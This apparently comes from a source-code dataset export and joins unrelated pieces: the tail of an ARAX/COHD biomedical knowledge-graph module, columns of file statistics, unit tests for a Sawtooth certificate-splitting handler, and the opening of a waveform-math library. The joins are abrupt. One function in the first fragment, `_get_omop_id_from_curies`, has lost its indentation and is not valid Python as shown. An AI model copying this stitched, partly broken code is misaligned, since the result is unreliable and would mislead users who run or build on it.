                            new_edge[target_preferred_key][source_preferred_key] = pvalue_data['p-value']
            if len(new_edge[target_preferred_key]) != 0:
                for source_preferred_key in new_edge[target_preferred_key]:
                    swagger_edge_key, swagger_edge = self._convert_to_swagger_edge(source_preferred_key, target_preferred_key, "chi_square_pvalue", new_edge[target_preferred_key][source_preferred_key])
                    source_dict[source_preferred_key] = source_qnode_key
                    target_dict[target_preferred_key] = target_qnode_key
                    # Finally add the current edge to our answer knowledge graph
                    final_kg.add_edge(swagger_edge_key, swagger_edge, qedge_key)
        # Add the nodes to our answer knowledge graph
        if len(source_dict) != 0:
            for source_preferred_key in source_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(source_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, source_dict[source_preferred_key])
        if len(target_dict) != 0:
            for target_preferred_key in target_dict:
                swagger_node_key, swagger_node = self._convert_to_swagger_node(target_preferred_key)
                final_kg.add_node(swagger_node_key, swagger_node, target_dict[target_preferred_key])
        if count != 0:
            # BUG FIX: report the accumulated average, not the last loop iteration's threshold
            log.info(f"The average threshold based on {COHD_method_percentile}th percentile of chi square pvalue is {average_threshold/count}")
        return final_kg
def _get_omop_id_from_curies(self, qnode_key: str, qg: QueryGraph, log: ARAXResponse) -> Dict[str, list]:
log.info(f"Getting the OMOP id for {qnode_key}")
qnode = qg.nodes[qnode_key]
# check if the input qnode is valid
if not isinstance(qnode.id, str) and not isinstance(qnode.id, list):
log.error(f"{qnode_key} has no curie id", error_code="NoCurie")
return {}
res_dict = {}
if isinstance(qnode.id, str):
# res = self.synonymizer.get_canonical_curies(curies=qnode.id)
# if res[qnode.id] is None:
# log.error("Can't find the preferred curie for {qnode.id}", error_code="NoPreferredCurie")
# return {}
# else:
# preferred_curie = res[qnode.id]['preferred_curie']
try:
omop_ids = self.cohdindex.get_concept_ids(qnode.id)
except:
log.error(f"Internal error accessing local COHD database.", error_code="DatabaseError")
return {}
res_dict[qnode.id] = omop_ids
else:
# classify the curies based on the preferred curie
# res = self.synonymizer.get_canonical_curies(curies=qnode.id)
# for curie in res:
# if res[curie] is None:
# log.error("Can't find the preferred curie for {curie}", error_code="NoPreferredCurie")
# return {}
# else:
# if res[curie]['preferred_curie'] not in res_dict:
# res_dict[res[curie]['preferred_curie']] = []
for curie in qnode.id:
try:
omop_ids = self.cohdindex.get_concept_ids(curie)
except:
log.error(f"Internal error accessing local COHD database.", error_code="DatabaseError")
return {}
res_dict[curie] = omop_ids
return res_dict
def _convert_to_swagger_edge(self, subject: str, object: str, name: str, value: float) -> Tuple[str, Edge]:
    """Package one COHD statistic *name*=*value* as a TRAPI edge from *subject* to *object*.

    Returns an (edge_key, Edge) pair.  Also increments self.count as a running tally
    of edges built by this instance.
    """
    self.count += 1
    swagger_edge = Edge()
    swagger_edge.subject = subject
    swagger_edge.object = object
    swagger_edge.predicate = f"biolink:has_{name}_with"
    swagger_edge.relation = None
    # Attribute metadata: EDAM "statistical estimate" datum, sourced from the COHD API.
    attribute_type = "EDAM:data_0951"
    cohd_url = "http://cohd.smart-api.info/"
    swagger_edge.attributes = [
        Attribute(type=attribute_type, name=name, value=str(value), url=cohd_url),
        Attribute(name="provided_by", value="ARAX/COHD", type=eu.get_attribute_type("provided_by")),
        Attribute(name="is_defined_by", value="ARAX", type=eu.get_attribute_type("is_defined_by")),
    ]
    swagger_edge_key = f"COHD:{subject}-has_{name}_with-{object}"
    return swagger_edge_key, swagger_edge
def _convert_to_swagger_node(self, node_key: str) -> Tuple[str, Node]:
    """Build a TRAPI node for curie *node_key*, returning a (node_key, Node) pair.

    Name and category come from the synonymizer's canonical record for the curie.
    """
    # Fetch the canonical record once instead of issuing two identical lookups.
    canonical = self.synonymizer.get_canonical_curies(node_key)[node_key]
    swagger_node = Node()
    swagger_node_key = node_key
    swagger_node.name = canonical['preferred_name']
    swagger_node.description = None
    swagger_node.category = canonical['preferred_category']
    return swagger_node_key, swagger_node
| 61.427943
| 319
| 0.643093
| 6,929
| 55,838
| 4.829701
| 0.041853
| 0.103631
| 0.077992
| 0.024204
| 0.897415
| 0.888391
| 0.879068
| 0.873659
| 0.868161
| 0.865232
| 0
| 0.006325
| 0.283642
| 55,838
| 908
| 320
| 61.495595
| 0.8303
| 0.0752
| 0
| 0.78187
| 0
| 0.042493
| 0.135305
| 0.028404
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011331
| false
| 0.050992
| 0.026912
| 0
| 0.084986
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
0b450ade8c4ffafb52b0802e76b7bfde1a9eaf50
| 14,981
|
py
|
Python
|
test/test_split_ggo.py
|
project-origin/datahub_processor
|
9abdf64d22f7487d0eaa34d92ebc3f09089d4105
|
[
"MIT"
] | null | null | null |
test/test_split_ggo.py
|
project-origin/datahub_processor
|
9abdf64d22f7487d0eaa34d92ebc3f09089d4105
|
[
"MIT"
] | null | null | null |
test/test_split_ggo.py
|
project-origin/datahub_processor
|
9abdf64d22f7487d0eaa34d92ebc3f09089d4105
|
[
"MIT"
] | null | null | null |
import unittest
import pytest
import json
from datetime import datetime, timezone
from src.datahub_processor.ledger_dto import GGO, SplitGGOPart, SplitGGORequest, GGONext, GGOAction, generate_address, AddressPrefix
from bip32utils import BIP32Key
from sawtooth_sdk.processor.exceptions import InvalidTransaction, InternalError
from src.datahub_processor.split_ggo_handler import SplitGGOTransactionHandler
from .mocks import MockContext, FakeTransaction, FakeTransactionHeader
from marshmallow_dataclass import class_schema
class TestIssueGGO(unittest.TestCase):
def create_fake_transaction(self, inputs, outputs, payload, key: BIP32Key):
    """Build a FakeTransaction whose header is batched and signed with *key*."""
    public_hex = key.PublicKey().hex()
    header = FakeTransactionHeader(
        batcher_public_key=public_hex,
        dependencies=[],
        family_name="datahub",
        family_version="0.1",
        inputs=inputs,
        outputs=outputs,
        signer_public_key=public_hex)
    return FakeTransaction(header=header, payload=payload)
@pytest.mark.unittest
def test_identifiers(self):
    """The handler must advertise the expected Sawtooth family metadata."""
    handler = SplitGGOTransactionHandler()
    self.assertEqual(handler.family_name, 'SplitGGORequest')
    versions = handler.family_versions
    self.assertEqual(len(versions), 1)
    self.assertIn('0.1', versions)
    namespaces = handler.namespaces
    self.assertEqual(len(namespaces), 1)
    self.assertIn('849c0b', namespaces)
@pytest.mark.unittest
def test_internal_error(self):
    """apply() with no transaction/context must fail with the generic InternalError."""
    with self.assertRaises(InternalError) as caught:
        SplitGGOTransactionHandler().apply(None, None)
    self.assertEqual(str(caught.exception), 'An unknown error has occured.')
@pytest.mark.unittest
def test_transfer_ggo_success(self):
    """Splitting an 80-unit GGO into 10/20/50 rewrites the source and creates the children."""
    key = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
    ggo_src = generate_address(AddressPrefix.GGO, key.PublicKey())
    emissions = {
        "co2": {
            "value": 1113342.14,
            "unit": "g/Wh",
        },
        "so2": {
            "value": 9764446,
            "unit": "g/Wh",
        },
    }
    ggo = GGO.get_schema().dumps(GGO(
        origin='meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c',
        amount=80,
        begin=datetime(2020, 1, 1, 12, tzinfo=timezone.utc),
        end=datetime(2020, 1, 1, 13, tzinfo=timezone.utc),
        tech_type='T12412',
        fuel_type='F010101',
        sector='DK1',
        next=None,
        emissions=emissions
    )).encode('utf8')
    context = MockContext(states={ggo_src: ggo})
    split_spec = [("split1_add", 10), ("split2_add", 20), ("split3_add", 50)]
    payload = class_schema(SplitGGORequest)().dumps(SplitGGORequest(
        origin=ggo_src,
        parts=[SplitGGOPart(address=address, amount=amount) for address, amount in split_spec]
    )).encode('utf8')
    addresses = [ggo_src, "split1_add", "split2_add", "split3_add"]
    transaction = self.create_fake_transaction(
        inputs=addresses,
        outputs=addresses,
        payload=payload,
        key=key)

    SplitGGOTransactionHandler().apply(transaction, context)

    def assert_inherited_fields(obj):
        # Fields every GGO in this split shares with the parent.
        self.assertEqual(len(obj), 9)
        self.assertEqual(obj['begin'], '2020-01-01T12:00:00+00:00')
        self.assertEqual(obj['end'], '2020-01-01T13:00:00+00:00')
        self.assertEqual(obj['sector'], 'DK1')
        self.assertEqual(obj['tech_type'], 'T12412')
        self.assertEqual(obj['fuel_type'], 'F010101')
        self.assertEqual(obj['emissions'], emissions)

    # The source GGO keeps its identity but now points at the three children.
    self.assertIn(ggo_src, context.states)
    parent = json.loads(context.states[ggo_src].decode('utf8'))
    assert_inherited_fields(parent)
    self.assertEqual(parent['origin'], 'meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c')
    self.assertEqual(parent['amount'], 80)
    self.assertEqual(parent['next']['action'], GGOAction.SPLIT.name)
    self.assertEqual(len(parent['next']['addresses']), 3)
    for index, (address, _) in enumerate(split_spec):
        self.assertEqual(parent['next']['addresses'][index], address)

    # Each child carries its part amount, originates from the parent, and is a leaf.
    for address, amount in split_spec:
        child = json.loads(context.states[address].decode('utf8'))
        assert_inherited_fields(child)
        self.assertEqual(child['origin'], ggo_src)
        self.assertEqual(child['amount'], amount)
        self.assertEqual(child['next'], None)
@pytest.mark.unittest
def test_transfer_ggo_sum_not_equal(self):
    """Splitting must fail when the part amounts do not sum to the GGO amount."""
    owner_key = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
    ggo_src = generate_address(AddressPrefix.GGO, owner_key.PublicKey())
    # Stored GGO holds 40, but the requested parts only add up to 30.
    stored_ggo = GGO.get_schema().dumps(GGO(
        origin='meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c',
        amount=40,
        begin=datetime(2020, 1, 1, 12, tzinfo=timezone.utc),
        end=datetime(2020, 1, 1, 13, tzinfo=timezone.utc),
        tech_type='T12412',
        fuel_type='F010101',
        sector='DK1',
        next=None,
    )).encode('utf8')
    context = MockContext(states={ggo_src: stored_ggo})
    split_request = SplitGGORequest(
        origin=ggo_src,
        parts=[
            SplitGGOPart(address="split1_add", amount=10),
            SplitGGOPart(address="split2_add", amount=20),
        ],
    )
    payload = class_schema(SplitGGORequest)().dumps(split_request).encode('utf8')
    addresses = [ggo_src, "split1_add", "split2_add", "split3_add"]
    transaction = self.create_fake_transaction(
        inputs=addresses,
        outputs=addresses,
        payload=payload,
        key=owner_key)
    with self.assertRaises(InvalidTransaction) as invalid_transaction:
        SplitGGOTransactionHandler().apply(transaction, context)
    self.assertEqual(str(invalid_transaction.exception), 'The sum of the parts does not equal the whole')
@pytest.mark.unittest
def test_transfer_ggo_no_src_ggo(self):
    """Splitting must fail when the origin address holds no GGO."""
    owner_key = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
    ggo_src = generate_address(AddressPrefix.GGO, owner_key.PublicKey())
    ggo_dst = 'ggonextc37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c'
    # Ledger is completely empty: nothing stored at ggo_src.
    context = MockContext(states={})
    split_request = SplitGGORequest(
        origin=ggo_src,
        parts=[
            SplitGGOPart(address="split1_add", amount=10),
            SplitGGOPart(address="split2_add", amount=20),
        ],
    )
    payload = class_schema(SplitGGORequest)().dumps(split_request).encode('utf8')
    transaction = self.create_fake_transaction(
        inputs=[ggo_src, ggo_dst],
        outputs=[ggo_src, ggo_dst],
        payload=payload,
        key=owner_key)
    with self.assertRaises(InvalidTransaction) as invalid_transaction:
        SplitGGOTransactionHandler().apply(transaction, context)
    self.assertEqual(str(invalid_transaction.exception), f'Address "{ggo_src}" does not contain a valid GGO.')
@pytest.mark.unittest
def test_transfer_ggo_not_available(self):
    """Splitting must fail when the source GGO has already been spent."""
    owner_key = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
    ggo_src = generate_address(AddressPrefix.GGO, owner_key.PublicKey())
    ggo_dst = 'ggonextc37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c'
    # The GGO's `next` pointer is already set, i.e. it was transferred before.
    spent_ggo = GGO.get_schema().dumps(GGO(
        origin='meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c',
        amount=123,
        begin=datetime(2020, 1, 1, 12, tzinfo=timezone.utc),
        end=datetime(2020, 1, 1, 13, tzinfo=timezone.utc),
        tech_type='T12412',
        fuel_type='F010101',
        sector='DK1',
        next=GGONext(GGOAction.TRANSFER, ['somewhereontheledger']),
    )).encode('utf8')
    context = MockContext(states={ggo_src: spent_ggo})
    split_request = SplitGGORequest(
        origin=ggo_src,
        parts=[
            SplitGGOPart(address="split1_add", amount=10),
            SplitGGOPart(address="split2_add", amount=20),
        ],
    )
    payload = class_schema(SplitGGORequest)().dumps(split_request).encode('utf8')
    transaction = self.create_fake_transaction(
        inputs=[ggo_src, ggo_dst],
        outputs=[ggo_src, ggo_dst],
        payload=payload,
        key=owner_key)
    with self.assertRaises(InvalidTransaction) as invalid_transaction:
        SplitGGOTransactionHandler().apply(transaction, context)
    self.assertEqual(str(invalid_transaction.exception), 'GGO already has been used')
@pytest.mark.unittest
def test_transfer_ggo_not_authorized(self):
    """Splitting must fail when the transaction is signed by a non-owner key."""
    key_owner = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
    key_criminal = BIP32Key.fromEntropy("this_key_should_not_be_authorized".encode())
    # The GGO lives at an address derived from the *owner's* public key.
    ggo_src = generate_address(AddressPrefix.GGO, key_owner.PublicKey())
    ggo_dst = 'ggonextc37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c'
    stored_ggo = GGO.get_schema().dumps(GGO(
        origin='meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c',
        amount=30,
        begin=datetime(2020, 1, 1, 12, tzinfo=timezone.utc),
        end=datetime(2020, 1, 1, 13, tzinfo=timezone.utc),
        tech_type='T12412',
        fuel_type='F010101',
        sector='DK1',
        next=None,
    )).encode('utf8')
    context = MockContext(states={ggo_src: stored_ggo})
    split_request = SplitGGORequest(
        origin=ggo_src,
        parts=[
            SplitGGOPart(address="split1_add", amount=10),
            SplitGGOPart(address="split2_add", amount=20),
        ],
    )
    payload = class_schema(SplitGGORequest)().dumps(split_request).encode('utf8')
    # Sign with the unauthorized key.
    transaction = self.create_fake_transaction(
        inputs=[ggo_src, ggo_dst],
        outputs=[ggo_src, ggo_dst],
        payload=payload,
        key=key_criminal)
    with self.assertRaises(InvalidTransaction) as invalid_transaction:
        SplitGGOTransactionHandler().apply(transaction, context)
    self.assertEqual(str(invalid_transaction.exception), 'Invalid key for GGO')
@pytest.mark.unittest
def test_transfer_ggo_address_not_empty(self):
    """Splitting must fail when a destination address already holds a GGO."""
    owner_key = BIP32Key.fromEntropy("the_valid_key_that_owns_the_specific_ggo".encode())
    ggo_src = generate_address(AddressPrefix.GGO, owner_key.PublicKey())
    ggo_dst = 'ggonextc37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c'
    source_ggo = GGO.get_schema().dumps(GGO(
        origin='meaaaa1c37509b1de4a7f9f1c59e0efc2ed285e7c96c29d5271edd8b4c2714e3c8979c',
        amount=30,
        begin=datetime(2020, 1, 1, 12, tzinfo=timezone.utc),
        end=datetime(2020, 1, 1, 13, tzinfo=timezone.utc),
        tech_type='T12412',
        fuel_type='F010101',
        sector='DK1',
        next=None,
    )).encode('utf8')
    # Pre-populate one of the split destinations so it is not empty.
    occupying_ggo = GGO.get_schema().dumps(GGO(
        origin='meaaaa29d5271edd8b4c2714e3c8979c1c37509b1de4a7f9f1c59e0efc2ed285e7c96c',
        amount=123,
        begin=datetime(2020, 1, 1, 12, tzinfo=timezone.utc),
        end=datetime(2020, 1, 1, 13, tzinfo=timezone.utc),
        tech_type='T12412',
        fuel_type='F010101',
        sector='DK1',
        next=None,
    )).encode('utf8')
    context = MockContext(states={
        ggo_src: source_ggo,
        "split1_add": occupying_ggo,
    })
    split_request = SplitGGORequest(
        origin=ggo_src,
        parts=[
            SplitGGOPart(address="split1_add", amount=10),
            SplitGGOPart(address="split2_add", amount=20),
        ],
    )
    payload = class_schema(SplitGGORequest)().dumps(split_request).encode('utf8')
    transaction = self.create_fake_transaction(
        inputs=[ggo_src, ggo_dst],
        outputs=[ggo_src, ggo_dst],
        payload=payload,
        key=owner_key)
    with self.assertRaises(InvalidTransaction) as invalid_transaction:
        SplitGGOTransactionHandler().apply(transaction, context)
    self.assertEqual(str(invalid_transaction.exception), 'Destination address not empty')
| 36.36165
| 132
| 0.59462
| 1,459
| 14,981
| 5.94037
| 0.122687
| 0.091727
| 0.080997
| 0.019384
| 0.801777
| 0.769124
| 0.753086
| 0.740625
| 0.721472
| 0.721472
| 0
| 0.093006
| 0.282291
| 14,981
| 411
| 133
| 36.450122
| 0.713077
| 0
| 0
| 0.721713
| 1
| 0
| 0.165743
| 0.082972
| 0
| 0
| 0
| 0
| 0.189602
| 1
| 0.027523
| false
| 0
| 0.030581
| 0.003058
| 0.06422
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0b736d3920bf1e9d3b7f5791cb05bad5e9706c47
| 62,878
|
py
|
Python
|
peng/wave_functions.py
|
pmacosta/peng
|
ab05fac3c0a6c0f8c70ab3e456b5cc57f0484389
|
[
"MIT"
] | null | null | null |
peng/wave_functions.py
|
pmacosta/peng
|
ab05fac3c0a6c0f8c70ab3e456b5cc57f0484389
|
[
"MIT"
] | 1
|
2019-03-08T15:50:54.000Z
|
2019-03-08T15:50:54.000Z
|
peng/wave_functions.py
|
pmacosta/peng
|
ab05fac3c0a6c0f8c70ab3e456b5cc57f0484389
|
[
"MIT"
] | 2
|
2017-07-04T02:07:20.000Z
|
2019-02-07T16:05:09.000Z
|
"""
Waveform pseudo-type functions.
[[[cog
import os, sys
if sys.hexversion < 0x03000000:
import __builtin__
else:
import builtins as __builtin__
sys.path.append(os.environ['TRACER_DIR'])
import trace_ex_eng_wave_functions
exobj_eng = trace_ex_eng_wave_functions.trace_module(no_print=True)
]]]
[[[end]]]
"""
# wave_functions.py
# Copyright (c) 2013-2019 Pablo Acosta-Serafini
# See LICENSE for details
# pylint: disable=C0103,C0111,C0413,E1101,E1111,R0913,W0212
# Standard library imports
import copy
import math
import os
import warnings
# PyPI imports
if os.environ.get("READTHEDOCS", "") != "True":
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=RuntimeWarning)
import numpy as np
import pexdoc.exh
import pexdoc.pcontracts
# Intra-package imports imports
from .functions import remove_extra_delims
from .constants import FP_ATOL, FP_RTOL
from .wave_core import _interp_dep_vector, Waveform
###
# Functions
###
def _barange(bmin, bmax, inc):
    """Return points from bmin to bmax (inclusive) in steps of inc.

    np.arange's open upper bound can produce a spurious point past bmax;
    drop the last point unless it is (nearly) equal to bmax.
    """
    points = np.arange(bmin, bmax + inc, inc)
    if not np.isclose(bmax, points[-1], FP_RTOL, FP_ATOL):
        points = points[:-1]
    return points
def _bound_waveform(wave, indep_min, indep_max):
    """Add independent variable vector bounds if they are not in vector.

    Mutates ``wave`` in place: the independent vector is clipped to the
    inclusive range [indep_min, indep_max] (inserting either bound when it
    is not already a point of the vector) and the dependent vector is
    re-interpolated over the clipped independent vector.
    """
    indep_min, indep_max = _validate_min_max(wave, indep_min, indep_max)
    indep_vector = copy.copy(wave._indep_vector)
    # Promote an integer independent vector to float so that float bounds
    # can be inserted without truncation.
    if (
        isinstance(indep_min, float) or isinstance(indep_max, float)
    ) and indep_vector.dtype.name.startswith("int"):
        indep_vector = indep_vector.astype(float)
    # Insert the lower bound unless an existing point is (nearly) equal to it.
    min_pos = np.searchsorted(indep_vector, indep_min)
    if not np.isclose(indep_min, indep_vector[min_pos], FP_RTOL, FP_ATOL):
        indep_vector = np.insert(indep_vector, min_pos, indep_min)
    # Insert the upper bound unless an existing point is (nearly) equal to it.
    max_pos = np.searchsorted(indep_vector, indep_max)
    if not np.isclose(indep_max, indep_vector[max_pos], FP_RTOL, FP_ATOL):
        indep_vector = np.insert(indep_vector, max_pos, indep_max)
    dep_vector = _interp_dep_vector(wave, indep_vector)
    # Keep only the points inside the (inclusive) bounds.
    wave._indep_vector = indep_vector[min_pos : max_pos + 1]
    wave._dep_vector = dep_vector[min_pos : max_pos + 1]
def _build_units(indep_units, dep_units, op):
    """Combine dependent and independent units under operator ``op``.

    Returns "" when both are empty; omits the missing side otherwise.
    """
    if not (dep_units or indep_units):
        return ""
    if not indep_units:
        return dep_units
    if not dep_units:
        # Only independent units: "1/(u)" for division, "(u)" otherwise.
        if op == "/":
            return remove_extra_delims("1{0}({1})".format(op, indep_units))
        return remove_extra_delims("({0})".format(indep_units))
    return remove_extra_delims("({0}){1}({2})".format(dep_units, op, indep_units))
def _operation(wave, desc, units, fpointer):
"""Perform generic operation on a waveform object."""
ret = copy.copy(wave)
ret.dep_units = units
ret.dep_name = "{0}({1})".format(desc, ret.dep_name)
ret._dep_vector = fpointer(ret._dep_vector)
return ret
def _running_area(indep_vector, dep_vector):
"""Calculate running area under curve."""
rect_height = np.minimum(dep_vector[:-1], dep_vector[1:])
rect_base = np.diff(indep_vector)
rect_area = np.multiply(rect_height, rect_base)
triang_height = np.abs(np.diff(dep_vector))
triang_area = 0.5 * np.multiply(triang_height, rect_base)
return np.cumsum(np.concatenate((np.array([0.0]), triang_area + rect_area)))
def _validate_min_max(wave, indep_min, indep_max):
    """Validate min and max bounds are within waveform's independent variable vector.

    Returns the (possibly defaulted) ``(indep_min, indep_max)`` pair.
    ``None`` bounds default to the first/last point of the waveform's
    independent vector; when both are defaulted no validation is needed.
    """
    imin, imax = False, False
    if indep_min is None:
        indep_min = wave._indep_vector[0]
        imin = True
    if indep_max is None:
        indep_max = wave._indep_vector[-1]
        imax = True
    # Both bounds defaulted -> trivially valid, skip exception registration.
    if imin and imax:
        return indep_min, indep_max
    exminmax = pexdoc.exh.addex(
        RuntimeError, "Incongruent `indep_min` and `indep_max` arguments"
    )
    exmin = pexdoc.exh.addai("indep_min")
    exmax = pexdoc.exh.addai("indep_max")
    # The bounds must define a non-empty interval.
    exminmax(bool(indep_min >= indep_max))
    # Each explicit bound must fall inside the waveform's independent range
    # (up to floating-point tolerance).
    exmin(
        bool(
            (indep_min < wave._indep_vector[0])
            and (not np.isclose(indep_min, wave._indep_vector[0], FP_RTOL, FP_ATOL))
        )
    )
    exmax(
        bool(
            (indep_max > wave._indep_vector[-1])
            and (not np.isclose(indep_max, wave._indep_vector[-1], FP_RTOL, FP_ATOL))
        )
    )
    return indep_min, indep_max
@pexdoc.pcontracts.contract(wave=Waveform)
def acos(wave):
    r"""
    Return the arc cosine of a waveform's dependent variable vector.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.acos
    :raises:
     * RuntimeError (Argument \`wave\` is not valid)
     * ValueError (Math domain error)
    .. [[[end]]]
    """
    # acos is only defined for dependent values in [-1, 1].
    dep = wave._dep_vector
    out_of_domain = bool((min(dep) < -1) or (max(dep) > 1))
    pexdoc.exh.addex(ValueError, "Math domain error", out_of_domain)
    return _operation(wave, "acos", "rad", np.arccos)
@pexdoc.pcontracts.contract(wave=Waveform)
def acosh(wave):
    r"""
    Return the hyperbolic arc cosine of a waveform's dependent variable vector.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.acosh
    :raises:
     * RuntimeError (Argument \`wave\` is not valid)
     * ValueError (Math domain error)
    .. [[[end]]]
    """
    # acosh is only defined for dependent values >= 1.
    out_of_domain = bool(min(wave._dep_vector) < 1)
    pexdoc.exh.addex(ValueError, "Math domain error", out_of_domain)
    return _operation(wave, "acosh", "", np.arccosh)
@pexdoc.pcontracts.contract(wave=Waveform)
def asin(wave):
    r"""
    Return the arc sine of a waveform's dependent variable vector.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.asin
    :raises:
     * RuntimeError (Argument \`wave\` is not valid)
     * ValueError (Math domain error)
    .. [[[end]]]
    """
    # asin is only defined for dependent values in [-1, 1].
    dep = wave._dep_vector
    out_of_domain = bool((min(dep) < -1) or (max(dep) > 1))
    pexdoc.exh.addex(ValueError, "Math domain error", out_of_domain)
    return _operation(wave, "asin", "rad", np.arcsin)
@pexdoc.pcontracts.contract(wave=Waveform)
def asinh(wave):
    r"""
    Return the hyperbolic arc sine of a waveform's dependent variable vector.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.asinh
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # asinh is defined over all reals; no domain check needed.
    transformed = _operation(wave, "asinh", "", np.arcsinh)
    return transformed
@pexdoc.pcontracts.contract(wave=Waveform)
def atan(wave):
    r"""
    Return the arc tangent of a waveform's dependent variable vector.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.atan
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # atan is defined over all reals; no domain check needed.
    transformed = _operation(wave, "atan", "rad", np.arctan)
    return transformed
@pexdoc.pcontracts.contract(wave=Waveform)
def atanh(wave):
    r"""
    Return the hyperbolic arc tangent of a waveform's dependent variable vector.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.atanh
    :raises:
     * RuntimeError (Argument \`wave\` is not valid)
     * ValueError (Math domain error)
    .. [[[end]]]
    """
    # atanh is only defined for dependent values in [-1, 1].
    dep = wave._dep_vector
    out_of_domain = bool((min(dep) < -1) or (max(dep) > 1))
    pexdoc.exh.addex(ValueError, "Math domain error", out_of_domain)
    return _operation(wave, "atanh", "", np.arctanh)
@pexdoc.pcontracts.contract(
    wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def average(wave, indep_min=None, indep_max=None):
    r"""
    Return the running average of a waveform's dependent variable vector.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :param indep_min: Independent vector start point of computation
    :type indep_min: integer or float
    :param indep_max: Independent vector stop point of computation
    :type indep_max: integer or float
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.average
    :raises:
     * RuntimeError (Argument \`indep_max\` is not valid)
     * RuntimeError (Argument \`indep_min\` is not valid)
     * RuntimeError (Argument \`wave\` is not valid)
     * RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
       arguments)
    .. [[[end]]]
    """
    ret = copy.copy(wave)
    _bound_waveform(ret, indep_min, indep_max)
    # Running average = accumulated area divided by elapsed independent span.
    running = _running_area(ret._indep_vector, ret._dep_vector)
    running[0] = ret._dep_vector[0]
    spans = ret._indep_vector - ret._indep_vector[0]
    # First span is zero; patch it so the first average equals the first sample.
    spans[0] = 1.0
    ret._dep_vector = np.divide(running, spans)
    ret.dep_name = "average({0})".format(ret._dep_name)
    return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def ceil(wave):
    r"""
    Return the ceiling of a waveform's dependent variable vector.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for
    .. peng.wave_functions.ceil
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Ceiling preserves the original dependent units.
    transformed = _operation(wave, "ceil", wave.dep_units, np.ceil)
    return transformed
@pexdoc.pcontracts.contract(wave=Waveform)
def cos(wave):
    r"""
    Return the cosine of a waveform's dependent variable vector.

    :param wave: Waveform
    :type wave: :py:class:`peng.eng.Waveform`
    :rtype: :py:class:`peng.eng.Waveform`

    .. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
    .. Auto-generated exceptions documentation for peng.wave_functions.cos
    :raises: RuntimeError (Argument \`wave\` is not valid)
    .. [[[end]]]
    """
    # Result is dimensionless, hence empty dependent units.
    transformed = _operation(wave, "cos", "", np.cos)
    return transformed
